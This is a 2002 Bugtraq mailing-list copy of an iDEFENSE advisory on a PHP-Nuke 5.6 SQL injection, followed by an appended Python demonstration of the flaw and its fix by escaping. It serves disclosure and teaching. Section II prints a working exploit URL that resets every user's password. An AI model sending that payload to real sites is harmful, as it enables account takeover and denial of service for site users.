From dendler@idefense.com Sat Nov 2 01:50:18 2002
From: David Endler
To: bugtraq@securityfocus.com
Date: Thu, 31 Oct 2002 21:26:21 -0500
Subject: iDEFENSE Security Advisory 10.31.02c: PHP-Nuke SQL Injection Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 10.31.02c:
http://www.idefense.com/advisory/10.31.02c.txt
PHP-Nuke SQL Injection Vulnerability
October 31, 2002

I. BACKGROUND

"PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases."

More information is available at http://www.phpnuke.org.

II. DESCRIPTION

PHP-Nuke is susceptible to an SQL injection attack that allows an attacker to modify the users table to his or her liking. Any registered user of the target system can launch the attack by feeding certain unfiltered characters to the account manager module, and can target a specific user or all system users at once. The key is the ability to insert a backslash into the "bio" field, thereby escaping that field's closing quote and leaving the SQL query open for injection. The following example changes every PHP-Nuke user's password to "1":

Exploitation requires that the attacker log on, enter the account manager and determine his or her UID through the source of the page.
If the attacker's UID is 2, he or she can then launch the attack by requesting the following URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

The injected query is constructed as follows:

UPDATE nuke_users SET
      name = '',
      email = '',
      femail = '',
      url = 'http://',
      pass = 'xxxxx',
+--[  bio = '\',
|     user_avatar = '',
|     user_icq = '',
|     user_occ = '',
|     user_from = '',
|     user_intrest = '',
|     user_sig = '',
|     user_aim = '',
|     user_yim = '',
|     user_msnm = '',
+--[  newsletter = ', bio=0,pass=md5(1)/*'
WHERE uid='2'

The marked area is all treated as a single string value to store into bio: the backslash escapes bio's closing quote, and each following '' pair is read by MySQL as an embedded quote rather than as an empty value, so the literal only ends at the lone quote that opens the newsletter value. The remainder of the newsletter field (bio=0, pass=md5(1)) then becomes real column assignments, and the "/*" comments out the WHERE clause, leaving an UPDATE statement that sets the entire table (i.e. all users) to a password of MD5(1).

III. ANALYSIS

Exploitation allows an attacker to compromise any other system account, thereby gaining the privileges and identity of the compromised account. The attacker can also corrupt the entire users table, effectively denying service to legitimate users.

IV. DETECTION

iDEFENSE Labs successfully tested and exploited this vulnerability in PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in nature, administrators should not test it in a production environment.

V. VENDOR FIX

The author, Francisco Burzi, responded:

"PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack... The latest version is 6.0, with 6.5 under development. Old versions don't have support of any kind; all bug and security fixes apply in the new versions. So, the solution to this security hole is to update the software from 5.6 to version 6.0."

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-1242 to this issue.

VII. DISCLOSURE TIMELINE

09/17/2002  Issue disclosed to iDEFENSE
09/23/2002  Author notified through submission form
09/23/2002  iDEFENSE clients notified
10/01/2002  iDEFENSE second attempt at PHP-Nuke contact
10/20/2002  iDEFENSE third attempt at PHP-Nuke contact
10/31/2002  Response from Francisco Burzi (nukelite@users.sourceforge.net)
10/31/2002  Coordinated Public Disclosure

VIII. CREDIT

kill9 (kill9@hackers.com) is credited with discovering this vulnerability.

Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"

About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively monitors sources throughout the world, from technical vulnerabilities and hacker profiling to the global spread of viruses and other malicious code. Our security intelligence services provide decision-makers, frontline security professionals and network administrators with timely access to actionable intelligence and decision support on cyber-related threats. For more information, visit http://www.idefense.com.

- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@idefense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPcHlgUrdNYRLCswqEQLGcwCdH27Ssm5+bhXyONfPn7uE+hk/gckAoOKJ
IbcubmZUdFwWk9wRDlyT3kFj
=FWej
-----END PGP SIGNATURE-----
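As an added illustration of the string-boundary shift described in section II (example code written for this page, not PHP-Nuke's own account-manager code), the Python below assembles a reduced form of the UPDATE by plain quoting, lexes it the way MySQL reads single-quoted literals and /* comments to show which assignments actually take effect, and then repeats the build with each value escaped the way addslashes()/mysql_real_escape_string() would. The column list, the escape helper and the input values are constructed for the example and are assumptions, not PHP-Nuke internals.

```python
# Added illustration (not PHP-Nuke's code): assemble the account-manager UPDATE
# by quoting and concatenating, then lex it as MySQL would to see what survives.
COLUMNS = ["name", "email", "url", "pass", "bio", "user_sig", "newsletter"]

# Constructed input mirroring the advisory: lone backslash in "bio", injected
# tail in "newsletter"; unlisted columns are sent empty.
ATTACKER_INPUT = {"url": "http://", "pass": "xxxxx", "bio": "\\",
                  "newsletter": ", bio=0,pass=md5(1)/*"}

def mysql_escape(value):
    """Stand-in for addslashes(): neutralise backslash and quote in a literal."""
    return value.replace("\\", "\\\\").replace("'", "\\'")

def build_update(values, uid, escape=None):
    """Build the statement the naive way; 'escape' is applied to values if given."""
    parts = []
    for col in COLUMNS:
        val = values.get(col, "")
        parts.append(f"{col} = '{escape(val) if escape else val}'")
    return "UPDATE nuke_users SET " + ", ".join(parts) + f" WHERE uid='{uid}'"

def effective_statement(sql):
    """Lex like MySQL: in '...' a backslash escapes the next char and '' is a quote;
    outside a literal, '/*' discards the rest. Returns (SET assignments, WHERE kept)."""
    literals, code, i = [], [], 0
    while i < len(sql):
        if sql[i] == "'":                                # string literal
            j, buf = i + 1, []
            while j < len(sql):
                if sql[j] == "\\" and j + 1 < len(sql):
                    buf.append(sql[j + 1]); j += 2       # backslash escape
                elif sql[j] == "'" and sql[j + 1:j + 2] == "'":
                    buf.append("'"); j += 2              # doubled quote
                elif sql[j] == "'":
                    break                                # closing quote
                else:
                    buf.append(sql[j]); j += 1
            literals.append("".join(buf)); code.append("\0"); i = j + 1
        elif sql.startswith("/*", i):
            break                                        # comment eats the rest
        else:
            code.append(sql[i]); i += 1
    code = "".join(code)
    set_part = code.split(" SET ", 1)[1].split(" WHERE ")[0]
    lits, assignments = iter(literals), []
    for chunk in set_part.split(","):
        col, _, val = (s.strip() for s in chunk.partition("="))
        assignments.append((col, next(lits) if val == "\0" else val))
    return assignments, " WHERE " in code
```

With the unescaped build, the returned assignment list ends in ("bio", "0") and ("pass", "md5(1)") and the WHERE flag is False; with mysql_escape applied, all seven columns receive exactly the submitted values and the WHERE clause is intact.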